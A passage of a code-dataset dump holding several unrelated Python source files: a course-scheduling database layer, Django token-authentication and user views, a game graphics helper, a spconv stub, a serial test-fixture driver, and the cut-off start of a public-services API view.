subprocess.run(\n [executable, \"-c\", \"import sys; print(','.join(sys.path))\"],\n stdout=subprocess.PIPE,\n stderr=subprocess.DEVNULL,\n )\n .stdout.decode()\n .strip()\n )\n return ret.split(\",\")\n","repo_name":"sloria/ped","sub_path":"ped/pypath.py","file_name":"pypath.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"41"} +{"seq_id":"15619633915","text":"from app.allImports import *\nfrom app.updateCourse import *\nfrom app.models.models import *\nfrom app.logic.authorizedUser import AuthorizedUser\n# TODO: standarize docstring see https://www.python.org/dev/peps/pep-0257/\n\n\n'''\nadds the professors from a list to a database\n@param {list} professors - list of professors to be added\n@param {int} cid = the course id the where the instructors need to be added to\n'''\n\n\ndef addCourseInstructors(instructors, cid):\n for instructor in instructors:\n InstructorCourse(username=instructor, course=cid).save()\n\ndef addSTCourseInstructors(instructors, stid):\n for instructor in instructors:\n InstructorSTCourse(username=instructor, course=stid).save()\n\n'''\nadds division chair to database\n@param {list} users - list of users that need to be added as division chair\n@param {int} did - the division id where the division chairs are added to\n'''\n\n\ndef addDivisionChairs(users, did):\n for user in users:\n DivisionChair(username=user, did=did).save()\n\n'''\nadds division chair to database\n@param {list} users - list of users that need to be added as program chair\n@param {int} pid - the program id where the program chairs are added to\n'''\n\n\ndef addProgramChairs(users, pid):\n for user in users:\n ProgramChair(username=user, pid=pid).save()\n\n'''\ncreates division\n@param {string} name\n'''\n\n\ndef createDivision(name):\n division = Division(name=name)\n 
division.save()\n return(division.name, division.dID)\n\n'''creates program\n@param {string} name\n@param {int} divisionID\n\n@returns string, int\n'''\n\n\ndef createProgram(name, divisionID):\n program = Program(name=name, division=divisionID)\n program.save()\n return(program.name, program.pID)\n\n\n'''\ngets elements for the course sidebar\n@returns selectQuery\n'''\n\n\ndef getSidebarElements():\n\n return prefetch(Division.select(), Program, Subject)\n\n\n\n''' gets the instructors belonging to a course\n@param {list} courses - list of courses\n\n@returns{dict} dictionary of courses keys and instructor values\n'''\n\n\ndef createInstructorDict(courses):\n instructors = {}\n try:\n for course in courses:\n if \"SpecialTopicCourse\" in str(type(course)) :\n instructors[course.stId] = InstructorSTCourse.select().where(\n InstructorSTCourse.course == course.stId)\n else:\n instructors[course.cId] = InstructorCourse.select().where(\n InstructorCourse.course == course.cId)\n except:\n for course in courses:\n instructors[course.cId] = InstructorCourse.select().where(\n InstructorCourse.course == course.cId)\n return instructors\n\n'''\ngets all of the buildings\n@returns query object of the buildings\n'''\n\n\ndef getAllBuildings():\n return Building.select().order_by(Building.name)\n\n'''\ngets all the rooms that belong to a building\n'''\n\n\ndef getRoomsByBuilding(building):\n return Rooms.select().where(Rooms.building == building.building)\n\n'''\ngets all terms\nreturn terms\n'''\n\n\ndef getAllTerms():\n return Term.select().order_by(-Term.termCode)\n\ndef isTermOpen(termID):\n ''' returns booleans stating whether the term is open for editing/adding a course'''\n if (Term.get(Term.termCode == int(termID)).term_state == 1):\n return True\n else:\n return False\n\n\ndef isTermLocked(termID):\n ''' returns booleans stating whether the term is locked'''\n if (Term.get(Term.termCode == int(termID)).state == 2):\n return True\n else:\n return False\n\ndef isTermTracking(termID):\n ''' returns booleans stating whether the term is locked'''\n if (Term.get(Term.termCode == int(termID)).state == 1):\n return True\n else:\n return False\n\n\n\ndef editInstructors(newInstructors, courseID):\n ''' edits the instructs give a list of the new instructors\n @param {list} newInstructors - list of new instructors\n @param {int} courseID\n '''\n\n oldInstructors = InstructorCourse.select().where(InstructorCourse.course == courseID)\n for oldInstructor in oldInstructors:\n if oldInstructor.username.username not in newInstructors:\n oldInstructor.delete_instance()\n else:\n newInstructors.remove(oldInstructor.username.username)\n for instructor in newInstructors:\n newInstructor = InstructorCourse(username=instructor, course=courseID)\n newInstructor.save()\n\ndef editSTInstructors(newInstructors, courseID):\n ''' edits the instructs give a list of the new instructors\n @param {list} newInstructors - list of new instructors\n @param {int} courseID\n '''\n oldInstructors = InstructorSTCourse.select().where(\n InstructorSTCourse.course == courseID)\n for oldInstructor in oldInstructors:\n if oldInstructor.username.username not in newInstructors:\n oldInstructor.delete_instance()\n else:\n newInstructors.remove(oldInstructor.username.username)\n for instructor in newInstructors:\n newInstructor = InstructorSTCourse(\n username=instructor, course=courseID)\n newInstructor.save()\n\n\ndef editCourse(data, prefix, professors, crosslistedCourses):\n '''THIS FUNCTION EDITS THE COURSE DATA TABLE'''\n # check to 
see if the user has privileges to edit\n # get the course object\n #TODO: We are not doing null checks on the portion of\n #the code which is causing crashes on the system\n au = AuthorizedUser()\n course = Course.get(Course.cId == int(data['cid']))\n print(\"course\",course.faculty_credit)\n #CHECK VALUES FOR NULL\n room = data[\"room\"] if data[\"room\"] else None\n capacity = data['capacity'] if data['capacity'] else None\n schedule = data['schedule'] if data['schedule'] else None\n section = data['section'] if data['section'] else None\n faculty_credit= data['faculty_credit'] if data['faculty_credit'] else \"1\"\n\n if data['notes'].replace(\" \", \"\") == \"\":\n notes = None\n else:\n notes = data['notes']\n\n course.crossListed = int(data[\"crossListed\"])\n course.term = data['term']\n course.capacity = capacity\n course.section = section\n course.rid = room\n course.schedule = schedule\n course.notes = notes\n course.lastEditBy = au.username\n course.faculty_credit = faculty_credit\n course.offCampusFlag = bool(data.get('offCampusFlag', False))\n course.save()\n new_instruc = professors[:]\n editInstructors(professors, data['cid'])\n editCrosslistedCourse(course, crosslistedCourses, new_instruc)\n\ndef editCrosslistedCourse(parent, newCourses, newInstructors):\n\n '''\n\n\n '''\n newCourses = map(int, newCourses)\n #find courses where parent is equal to course.cId\n oldChildCourses = Course.select().where(Course.parentCourse == parent.cId)\n\n #if course has crosslisted children or newCrosslist course has been selested\n if oldChildCourses.exists() or newCourses:\n for oldCourse in oldChildCourses:\n\n #update it with parent data it if newCourse still contains oldcourse\n if oldCourse.bannerRef.reFID in newCourses:\n updateChildCourse(oldCourse, parent, newInstructors)\n #remove this course from current newCourses list after updating\n newCourses = filter(lambda a: a != oldCourse.bannerRef.reFID, newCourses)\n else:\n #childCrosslistcourse has been removed, so delete it from database\n rm = RoomPreferences()\n deleteChildCourse(oldCourse, rm)\n\n #add remaing courses as new crosslisted child course to parent course\n if newCourses:\n for newCourse in newCourses:\n #create a new childCrosslisted course for parent\n createChildCourse(newCourse, parent, newInstructors)\n\n\ndef getCourseTimelineSchedules(day,tid):\n schedules = ScheduleDays.select(ScheduleDays.schedule\n ).join(Course, on=(Course.schedule == ScheduleDays.schedule)\n ).join(BannerSchedule, on=(BannerSchedule.sid == ScheduleDays.schedule)\n ).where(ScheduleDays.day == day\n ).where(Course.term == tid\n ).distinct(\n ).order_by(BannerSchedule.startTime)\n return schedules\n\n\ndef editSTCourse(data, prefix, professors, status, cfg):\n '''THIS FUNCTION EDITS THE COURSE DATA TABLE'''\n # check to see if the user has privileges to edit\n # get the specialTopicCourse object\n #TODO: We are not doing null checks on the portion of\n #the code which is causing crashes on the system\n specialTopicCourse = SpecialTopicCourse.get(SpecialTopicCourse.stId == int(data['stid']))\n #import pdb; pdb.set_trace()\n\n au = AuthorizedUser()\n #CHECK VALUES FOR NULL\n room = data[\"room\"] if data[\"room\"] else None\n capacity = data['capacity'] if data['capacity'] else None\n schedule = data['schedule'] if data['schedule'] else None\n section = data['section'] if data['section'] else None\n faculty_credit= data['faculty_credit'] if data[\"faculty_credit\"] else \"1\"\n\n if data['notes'].replace(\" \", \"\") == \"\":\n notes = None\n 
else:\n notes = data['notes']\n\n\n specialTopicCourse.status = status\n if status in cfg['specialTopicLogic']['approved']:\n bannercourses = BannerCourses(subject = specialTopicCourse.prefix,\n number = specialTopicCourse.bannerRef.number,\n ctitle = specialTopicCourse.specialTopicName,\n is_active = 1)\n bannercourses.save()\n course = Course(bannerRef = bannercourses,\n prefix = specialTopicCourse.prefix,\n term = specialTopicCourse.term,\n schedule = specialTopicCourse.schedule,\n capacity = specialTopicCourse.capacity,\n section = specialTopicCourse.section,\n specialTopicName = specialTopicCourse.specialTopicName,\n notes = specialTopicCourse.notes,\n crossListed = specialTopicCourse.crossListed,\n rid = specialTopicCourse.rid,\n faculty_credit = specialTopicCourse.faculty_credit,\n offCampusFlag = specialTopicCourse.offCampusFlag\n )\n course.save()\n update_course = DataUpdate()\n addCourseInstructors(professors, course.cId)\n if isTermTracking(specialTopicCourse.term.termCode):\n update_course.addCourseChange(int(course.cId), \"create\")\n specialTopicCourse.status = status\n specialTopicCourse.crossListed = int(data[\"crossListed\"])\n specialTopicCourse.capacity = capacity\n specialTopicCourse.rid = room\n specialTopicCourse.schedule = schedule\n specialTopicCourse.notes = notes\n specialTopicCourse.section = section\n specialTopicCourse.lastEditBy = au.username\n specialTopicCourse.credits = data['credits']\n specialTopicCourse.description = data['description']\n specialTopicCourse.prereqs = data['prereqs']\n specialTopicCourse.majorReqsMet = data['majorReqsMet']\n specialTopicCourse.minorReqsMet = data['minorReqsMet']\n specialTopicCourse.concentrationReqsMet = data['concentrationReqsMet']\n specialTopicCourse.perspectivesMet = data['perspectivesMet']\n specialTopicCourse.faculty_credit= data[\"faculty_credit\"]\n specialTopicCourse.offCampusFlag = bool(data.get('offCampusFlag', False))\n\n editSTInstructors(professors, data['stid'])\n specialTopicCourse.save()\n\ndef addInstructorsChild(instructors, parentId, cid):\n '''\n add parent course instructors to childCourses when editing parent course\n\n '''\n parentInstructors = InstructorCourse.select().where(InstructorCourse.course == parentId)\n childInstructors = InstructorCourse.select().where(InstructorCourse.course == cid)\n present = False\n for parentInstructor in parentInstructors:\n for childInstructor in childInstructors:\n if(childInstructor.username.username) == parentInstructor.username.username:\n present = True\n if present == False:\n #clone parent instructor to child\n InstructorCourse(username = parentInstructor.username.username, course = cid).save()\n present = False\n #delete entries that is present in child but not parent\n\n exists = False\n for childInstructor in childInstructors:\n for parentInstructor in parentInstructors:\n if(childInstructor.username.username) == parentInstructor.username.username:\n exists = True\n if exists == False:\n #remove the child instructor\n childInstructor.delete_instance()\n exists = False\n\n\ndef createChildCourse(course_id, parent, newInstructors):\n '''\n create a crosslisted child course for a parent course\n Functionalities:\n a. Creates a child course in Course table\n b. Creates an entry in Crosslisted table to maintain its verified relationship with parent\n c. Create entries in InstructorCourse table so child course instructors same as parent\n d. 
if parent has roomPreference entry, clone it for child\n '''\n qs = CrossListed.select().where((CrossListed.courseId == parent.cId) & (CrossListed.crosslistedCourse == parent.cId))\n #if uncrosslisted course has selected a crosslist course\n if not qs.exists():\n crosslisted = CrossListed(\n courseId = parent.cId,\n crosslistedCourse= parent.cId,\n prefix= parent.prefix,\n verified = True,\n term= parent.term\n ).save()\n\n course_prefix=BannerCourses.get(BannerCourses.reFID == int(course_id)).subject_id\n\n #create a child course\n cc_course = Course.create(bannerRef=course_id,\n prefix = course_prefix,\n term = parent.term,\n schedule = parent.schedule,\n capacity = parent.capacity,\n specialTopicName = parent.specialTopicName,\n notes = parent.notes,\n crossListed = parent.crossListed,\n parentCourse = parent.cId,\n section = parent.section,\n prereq = parent.prereq,\n offCampusFlag = parent.offCampusFlag\n )\n #TODO:create its instructors\n addInstructorsChild(newInstructors, parent.cId, cc_course.cId)\n\n #create its crosslisted relationship entry with parent\n crosslisted = CrossListed(\n courseId = parent.cId,\n crosslistedCourse= cc_course.cId,\n prefix= course_prefix,\n verified = False,\n term= parent.term\n ).save()\n\n #create its roomPreference if parent has any\n\ndef deleteChildCourse(childCourse, roompreference):\n '''\n deletes crosslisted course from parent\n deletes course itself, Crosslisted relationship, instructors, roompreference entry if any\n '''\n #delete its crosslisted relationship with parent\n q = CrossListed.select().where(\n (CrossListed.crosslistedCourse == childCourse.cId) &\n (CrossListed.courseId == childCourse.parentCourse)\n )\n\n q.first().delete_instance()\n\n #delete the course itself\n childCourse.delete_instance()\n\n #delete course instructors\n instructors = InstructorCourse.select().where(InstructorCourse.course == childCourse.cId)\n for instructor in instructors:\n instructor.delete_instance()\n\n #delete course roompreference if any; check if it has a term so we where with AND\n roompreference.delete_room_preference(childCourse.cId)\n\ndef updateChildCourse(course, parent, newInstructors):\n '''\n updates crosslisted child course when edit has been made to its parent\n\n '''\n #update general course data with parent data\n course.term = parent.term\n course.schedule = parent.schedule\n course.capacity = parent.capacity\n course.specialTopicName = parent.specialTopicName\n course.notes = parent.notes\n course.crossListed = parent.crossListed\n course.parentCourse = parent.cId\n course.section = parent.section\n course.prereq = parent.prereq\n course.offCampusFlag = parent.offCampusFlag\n course.save()\n\n #update its instructors\n addInstructorsChild(newInstructors, parent.cId, course.cId)\n","repo_name":"BCStudentSoftwareDevTeam/cas","sub_path":"app/logic/databaseInterface.py","file_name":"databaseInterface.py","file_ext":"py","file_size_in_byte":16938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"4562434638","text":"from http import HTTPStatus\nfrom rest_framework.authentication import TokenAuthentication\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.decorators import authentication_classes, permission_classes\nfrom rest_framework.authtoken.models import Token\n\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom authentication.serializers import CreateUserSerializer, UserProfileSerializer\nfrom 
django.forms.models import model_to_dict\nfrom django.contrib.auth.models import User\n\nfrom rest_framework.decorators import api_view, renderer_classes\nfrom rest_framework import status\n\n@api_view(['POST'])\n@authentication_classes([TokenAuthentication])\n@permission_classes([IsAuthenticated])\ndef logout_view(request):\n \"\"\"\n Log out users\n \"\"\"\n token = Token.objects.get(user=request.user)\n key = token.key\n token.delete()\n return Response(data={\"token\": key}, status=HTTPStatus.ACCEPTED)\n\n\n@api_view(['GET'])\n@authentication_classes([TokenAuthentication])\n@permission_classes([IsAuthenticated])\ndef allusers_view(request):\n \"\"\"\n Fetch all users\n \"\"\"\n if request.user.is_superuser:\n users = User.objects.all().values(\"id\", \"username\", \"is_staff\", \"is_superuser\", \"email\")\n return Response(data=users, status=HTTPStatus.ACCEPTED)\n \n else:\n return Response(status=HTTPStatus.FORBIDDEN)\n\n\nclass ProfileApiView(APIView):\n authentication_classes = [TokenAuthentication]\n permission_classes = [IsAuthenticated]\n serializer_class = UserProfileSerializer\n\n def get(self, request):\n user = User.objects.filter(id=request.user.id).values(\"username\", \"first_name\", \"last_name\", \"email\", \"date_joined\").first()\n return Response(data=user, status=200)\n\n def clean_userdata(self):\n del self.profile_user['id']\n del self.profile_user['password']\n del self.profile_user['is_superuser']\n del self.profile_user['is_active']\n del self.profile_user['is_staff']\n del self.profile_user['groups']\n del self.profile_user['user_permissions']\n\n\n def post(self, request):\n self.profile_user = request.user\n serializer = self.serializer_class(data=request.data)\n if serializer.is_valid(raise_exception=True):\n self.profile_user.username = serializer.data['username']\n self.profile_user.first_name = serializer.data['first_name']\n self.profile_user.last_name = serializer.data['last_name']\n self.profile_user.email = serializer.data['email']\n self.profile_user.save()\n \n # Change user model to dict object (desrialize)\n self.profile_user = model_to_dict(self.profile_user)\n\n # Clean user sensitive data\n self.clean_userdata()\n\n return Response(data=self.profile_user, status=200)\n else:\n return Response(data={\"error\": \"Wrong Input, Please try again\"}, status=400)\n\n\n\nclass CreateUserApiView(APIView):\n\n authentication_classes = []\n permission_classes = []\n serializer_class = CreateUserSerializer\n\n def clean_userdata(self):\n del self.profile_user['id']\n del self.profile_user['password']\n del self.profile_user['is_superuser']\n del self.profile_user['is_active']\n del self.profile_user['is_staff']\n del self.profile_user['groups']\n del self.profile_user['user_permissions']\n\n\n def post(self, request):\n try:\n serializer = self.serializer_class(data=request.data)\n if serializer.is_valid(raise_exception=True):\n self.profile_user = User(\n email = serializer.data['email'],\n username = serializer.data['username'],\n first_name = serializer.data['first_name'],\n last_name = serializer.data['last_name'],\n )\n\n self.profile_user.set_password(serializer.data['password'])\n self.profile_user.save()\n \n # Change user model to dict object (desrialize)\n self.profile_user = model_to_dict(self.profile_user)\n\n # Clean user sensitive data\n self.clean_userdata()\n\n return Response(data=self.profile_user, status=200)\n \n except BaseException as e:\n return Response(\n {\n \"success\": False, \n \"error\": f\"Error: {e}\"\n }, 
status=status.HTTP_400_BAD_REQUEST)\n\n\n\n","repo_name":"TSD-Planning-Poker/Backend","sub_path":"authentication/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"7555471212","text":"from arcade import Shape, color\nimport arcade\nfrom trainfinity2.constants import (\n CARGO_SIZE,\n)\nfrom trainfinity2.model import CargoType\n\nFILL_COLOR_FROM_CARGO_TYPE = {\n CargoType.IRON: color.TROLLEY_GREY,\n CargoType.COAL: color.SMOKY_BLACK,\n CargoType.STEEL: color.STEEL_BLUE,\n}\n\n\ndef get_cargo_shape(\n x: float, y: float, cargo_type: CargoType, tilt_angle: float = 0\n) -> list[Shape]:\n filled_rectangle = arcade.create_rectangle_filled(\n x,\n y,\n CARGO_SIZE,\n CARGO_SIZE,\n color=FILL_COLOR_FROM_CARGO_TYPE[cargo_type],\n tilt_angle=tilt_angle,\n )\n rectangle_outline = arcade.create_rectangle_outline(\n x, y, CARGO_SIZE, CARGO_SIZE, color=color.BLACK, tilt_angle=tilt_angle\n )\n return [filled_rectangle, rectangle_outline]\n","repo_name":"Godsmith/trainfinity2","sub_path":"trainfinity2/graphics/cargo.py","file_name":"cargo.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"73993517884","text":"from typing import overload, Any, Callable, Dict, List, Optional, Set, Tuple, Type, Union\nfrom pccm.stubs import EnumValue, EnumClassValue\nfrom ...cumm.gemm.main import GemmAlgoDesp\nfrom cumm.tensorview import Tensor\nfrom cumm.tensorview import CUDAKernelTimer\nclass ConvAlgoDesp(GemmAlgoDesp):\n ndim: int\n op_type: int\n iter_algo: int\n layout_i: int\n layout_w: int\n layout_o: int\n interleave_i: int\n interleave_w: int\n interleave_o: int\n mask_sparse: bool\n increment_k_first: bool\n def __init__(self, ndim: int, op_type: int) -> None: \n \"\"\"\n Args:\n ndim: \n op_type: \n \"\"\"\n ...\n def __repr__(self) -> str: ...\n @staticmethod\n def conv_iwo_012_to_abc(op_type: int) -> List[int]: \n \"\"\"\n Args:\n op_type: \n \"\"\"\n ...\n @staticmethod\n def gemm_abc_012_to_iwo(op_type: int) -> List[int]: \n \"\"\"\n Args:\n op_type: \n \"\"\"\n ...\n @property\n def dtype_input(self) -> int: ...\n @property\n def dtype_weight(self) -> int: ...\n @property\n def dtype_output(self) -> int: ...\n def supported(self, m: int, n: int, k: int, C: int, K: int, mask_width: int) -> bool: \n \"\"\"\n Args:\n m: \n n: \n k: \n C: \n K: \n mask_width: \n \"\"\"\n ...\n def query_conv_workspace_size(self, m: int, n: int, k: int, split_k_slices: int, kv: int) -> int: \n \"\"\"\n Args:\n m: \n n: \n k: \n split_k_slices: \n kv: \n \"\"\"\n ...\n def supported_ldx_conv(self, ldi: int, ldw: int, ldo: int) -> bool: \n \"\"\"\n Args:\n ldi: \n ldw: \n ldo: \n \"\"\"\n ...\nclass ConvParams:\n conv_algo_desp: Any\n input: Tensor\n weight: Tensor\n output: Tensor\n split_k_slices: int\n padding: List[int]\n stride: List[int]\n dilation: List[int]\n alpha: float\n beta: float\n mask_width: int\n mask_filter: int\n reverse_mask: bool\n verbose: bool\n timer: CUDAKernelTimer\n workspace: Tensor = Tensor()\n mask: Tensor = Tensor()\n mask_argsort: Tensor = Tensor()\n indices: Tensor = Tensor()\n mask_output: Tensor = Tensor()\n stream: int\n def __init__(self, ndim: int, op_type: int, timer: CUDAKernelTimer = CUDAKernelTimer(False)) -> None: \n \"\"\"\n Args:\n ndim: \n op_type: \n timer: \n \"\"\"\n ...\nclass ConvMainUnitTest:\n @staticmethod\n def extract_mnk(op_type: int, N: int, 
C: int, K: int, kernel_volume: int, in_prod: int, out_prod: int, mask_sparse: bool) -> List[int]: \n \"\"\"\n Args:\n op_type: \n N: \n C: \n K: \n kernel_volume: \n in_prod: \n out_prod: \n mask_sparse: \n \"\"\"\n ...\n @staticmethod\n def implicit_gemm2(params: ConvParams) -> None: \n \"\"\"\n Args:\n params: \n \"\"\"\n ...\n @staticmethod\n def get_all_conv_algo_desp() -> List[ConvAlgoDesp]: ...\n","repo_name":"dvlab-research/spconv-plus","sub_path":"spconv/core_cc/cumm/conv/main.pyi","file_name":"main.pyi","file_ext":"pyi","file_size_in_byte":3179,"program_lang":"python","lang":"en","doc_type":"code","stars":138,"dataset":"github-code","pt":"41"} +{"seq_id":"1519808008","text":"import sys\nimport queue\nimport time\nimport serial\nfrom .simple_hdlc import HDLC\n\nACK = 0x01\nNACK = 0x02\nPING = 0x0A\nGPIO_GET = 0x0B\nMODE = 0x0C\nCOMM = 0x0D\nGPIO_SET = 0x0E\nUART_RX = 0x5A\nUART_TX = 0x6A\nUART_PWR = 0x6B\nI2C_TX = 0x7A\nI2C_RX = 0x7B\nSPI_XFER = 0x8A\nSET_PWM = 0x9A\nGET_TACH = 0xAA\nREPROG = 0xBB\n\nCMD_NAMES = {0x01: \"ACK\", 0x02: \"NACK\", 0x0A: \"PING\", 0x0B: \"GPIO_GET\", \\\n 0x0C: \"MODE\", 0x0D: \"COMM\", 0x0E: \"GPIO_SET\", \\\n 0x5A: \"UART_RX\", 0x6A: \"UART_TX\", 0x6B: \"UART_PWR\", \\\n 0x7A: \"I2C_TX\", 0x7B: \"I2C_RX\", 0x8A: \"SPI_XFER\", 0x9A: \"SET_PWM\", 0xAA: \"GET_TACH\",\n 0xBB: \"REPROG\" }\n\nINPUT = 0\nOUTPUT = 1\n\nHIGH = 1\nLOW = 0\n\ndef _decode_bytes(inbytes):\n line = \"\"\n for b in inbytes:\n line += chr(b)\n return line.replace(\"\\r\\n\", \"\")\n\nclass LagerFixture:\n def __init__(self, serial_port=None, debug=False, print_uart=False):\n self.debug = debug\n self.print_uart = print_uart\n self.ser_queue = queue.Queue()\n self.uart_queue = [queue.Queue()] * 10\n \n if serial_port is not None:\n self.ser = serial.Serial(serial_port, 9600, timeout=0.1)\n else:\n # Use default serial port if available\n try:\n serial_port = \"/dev/ttyACM0\"\n self.ser = serial.Serial(serial_port, 9600, timeout=0.1)\n except serial.serialutil.SerialException:\n print(\"ERROR: Failed to open connection to Lager Test Fixture. 
\" \\\n \"Check that fixture is attached and that you're connecting with the correct TTY device path.\")\n sys.exit(1)\n\n self.reset()\n\n def reset(self):\n self.ser.flushInput()\n self.h = HDLC(self.ser, self.debug)\n self.h.startReader(self.got_frame)\n\n def handle_ACK(self, frame):\n if self.debug: print(\"\\tCommand Acknowledged!\")\n\n def handle_NACK(self, frame):\n if self.debug: print(\"\\tCommand Error!\")\n\n def handle_GPIO_GET(self, frame):\n return [b > 0 for b in frame[1:]]\n\n # def handle_UART_RX(self, frame):\n # channel = frame[1]\n # if self.print_uart:\n # print(f\"UART {channel}: {frame[2:].decode('ascii')}\")\n # else:\n # self.uart_queue.put(frame)\n\n def handle_UART_RX(self, frame):\n channel = frame[1]\n if self.print_uart:\n line = _decode_bytes(frame[2:])\n print(f\"UART {channel}: {line}\")\n\n self.uart_queue[channel].put(frame[2:])\n \n def send_cmd(self, cmd, data=None):\n output = bytearray()\n output.append(cmd)\n if data:\n output.extend(data)\n self.h.sendFrame(output)\n\n def send_cmd_resp(self, cmd, data=None, timeout=0.5):\n if self.debug: \n if data != None:\n print(f\"Sending {CMD_NAMES[cmd]}: {' '.join([hex(d) for d in data])}\")\n else:\n print(f\"Sending {CMD_NAMES[cmd]} (No Data)\")\n self.send_cmd(cmd, data)\n \n return self.check_queue()\n\n def check_queue(self, timeout=0.05):\n start = time.time()\n\n while time.time() - start < timeout:\n try:\n frame = self.ser_queue.get(block=True, timeout=0.01)\n if self.debug == True and self.print_uart == False:\n print(f\"\\tReceived {frame}\")\n\n # if frame[0] == UART_RX:\n # self.handle_uart(frame)\n # continue\n\n try:\n func_name = \"handle_\" + CMD_NAMES[frame[0]]\n func = getattr(self, func_name)\n # return func(frame)\n func(frame)\n except (KeyError, AttributeError):\n if self.debug: print(f\"\\tGot frame: {frame}\")\n return frame\n except queue.Empty:\n continue\n\n def got_frame(self, frame):\n self.ser_queue.put(frame)\n\n def _reprog(self):\n self.send_cmd(REPROG)\n\n def ping(self):\n return self.send_cmd_resp(PING)\n\n def set_gpio_mode(self, pin, direction):\n self.send_cmd_resp(MODE, [pin, direction])\n\n def set_gpio(self, pin, level):\n self.send_cmd_resp(GPIO_SET, [pin, level])\n\n def get_gpio(self, pin):\n resp = self.send_cmd_resp(GPIO_GET)\n return resp[pin]\n\n def i2c_tx(self, channel, target, data):\n length = len(data)\n self.send_cmd_resp(I2C_TX, [channel, target, length] + data)\n\n def i2c_rx(self, channel, target, length):\n resp = self.send_cmd_resp(I2C_RX, [channel, target, length])\n return resp\n\n def spi_xfer(self, channel, ss, data):\n length = len(data)\n resp = self.send_cmd_resp(SPI_XFER, [channel, ss, length] + data)\n return resp\n\n def uart_rx(self, channel, timeout=0.1, decode=False):\n self.check_queue(timeout=timeout)\n lines = []\n while True:\n try:\n line = self.uart_queue[channel].get(block=False)\n if decode == True:\n line = line.decode(\"ascii\")\n elif decode:\n line = line.decode(decode)\n lines.append(line)\n except queue.Empty:\n return lines\n\n def uart_tx(self, channel, data):\n length = len(data)\n self.send_cmd_resp(UART_TX, [channel, length] + [ord(c) for c in data])\n\n def uart_pwr(self, channel, state):\n self.send_cmd_resp(UART_PWR, [channel, state])\n\n def set_freq(self, channel, freq, dc):\n freq_h = freq >> 8\n freq_l = freq & 0xFF\n val = (dc * 255) // 100\n self.send_cmd_resp(SET_PWM, [channel, freq_h, freq_l, val])\n\n def get_freq(self, channel):\n resp = self.send_cmd_resp(GET_TACH, [channel])\n if resp == None:\n 
print(\"No data returned\")\n return None, None\n freq = resp[1] << 8 | resp[2]\n dc = resp[3] << 8 | resp[4]\n dc /= 100\n return freq, dc","repo_name":"lagerdata/lager_fixture","sub_path":"lager_fixture/lager_fixture.py","file_name":"lager_fixture.py","file_ext":"py","file_size_in_byte":6031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"71009538045","text":"import abc\nimport logging as logger\nimport os\n\n# Create your views here.\nimport requests\nfrom rest_framework import filters, permissions\nfrom rest_framework.generics import RetrieveUpdateDestroyAPIView\nfrom rest_framework.pagination import LimitOffsetPagination\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom cpsv.cpsv_rdf_call import get_contact_points\nfrom cpsv.models import PublicService, ContactPoint\nfrom cpsv.rdf_call import (\n get_dropdown_options_for_public_services,\n get_dropdown_options_for_contact_points,\n get_contact_point_uris_filter,\n)\nfrom cpsv.rdf_call import get_public_service_uris_filter\nfrom cpsv.serializers import PublicServiceSerializer, ContactPointSerializer\n\nRDF_FUSEKI_URL = os.environ[\"RDF_FUSEKI_URL\"]\nURI_IS_CLASSIFIED_BY = os.environ[\"URI_IS_CLASSIFIED_BY\"]\nURI_HAS_COMPETENT_AUTHORITY = os.environ[\"URI_HAS_COMPETENT_AUTHORITY\"]\nURI_HAS_CONTACT_POINT = os.environ[\"URI_HAS_CONTACT_POINT\"]\n\n\nclass PaginationHandlerMixin(object):\n @property\n def paginator(self):\n if not hasattr(self, \"_paginator\"):\n if self.pagination_class is None:\n self._paginator = None\n else:\n self._paginator = self.pagination_class()\n else:\n pass\n return self._paginator\n\n def paginate_queryset(self, queryset):\n if self.paginator is None:\n return None\n return self.paginator.paginate_queryset(queryset, self.request, view=self)\n\n def get_paginated_response(self, data):\n assert self.paginator is not None\n return self.paginator.get_paginated_response(data)\n\n\nclass SmallResultsSetPagination(LimitOffsetPagination):\n default_limit = 5\n limit_query_param = \"rows\"\n offset_query_param = \"page\"\n\n\nclass RdfContactPointsAPIView(APIView, PaginationHandlerMixin):\n pagination_class = SmallResultsSetPagination\n queryset = ContactPoint.objects.all()\n serializer_class = ContactPointSerializer\n filter_backends = [filters.OrderingFilter]\n ordering_fields = [\"description\"]\n permission_classes = [permissions.IsAuthenticated]\n\n def post(self, request, format=None, *args, **kwargs):\n q = ContactPoint.objects.all()\n keyword = self.request.GET.get(\"keyword\", \"\")\n\n dict_rdf_filters = request.data[\"rdfFilters\"]\n logger.info(\"dict_rdf_filters: %s\", dict_rdf_filters)\n\n rdf_uris = get_contact_point_uris_filter(filter_public_service=dict_rdf_filters.get(URI_HAS_CONTACT_POINT))\n logger.info(\"rdf_uris: %s\", rdf_uris)\n\n if rdf_uris:\n q = q.filter(identifier__in=rdf_uris)\n if keyword:\n q = q.filter(name__icontains=keyword)\n else:\n q = ContactPoint.objects.none()\n\n page = self.paginate_queryset(q)\n\n serializer = self.get_paginated_response(\n self.serializer_class(page, many=True, context={\"request\": request}).data\n )\n\n return Response(serializer.data)\n\n\nclass RdfPublicServicesAPIView(APIView, PaginationHandlerMixin):\n pagination_class = SmallResultsSetPagination\n queryset = PublicService.objects.all()\n serializer_class = PublicServiceSerializer\n filter_backends = [filters.OrderingFilter]\n ordering_fields = [\"name\"]\n permission_classes = 
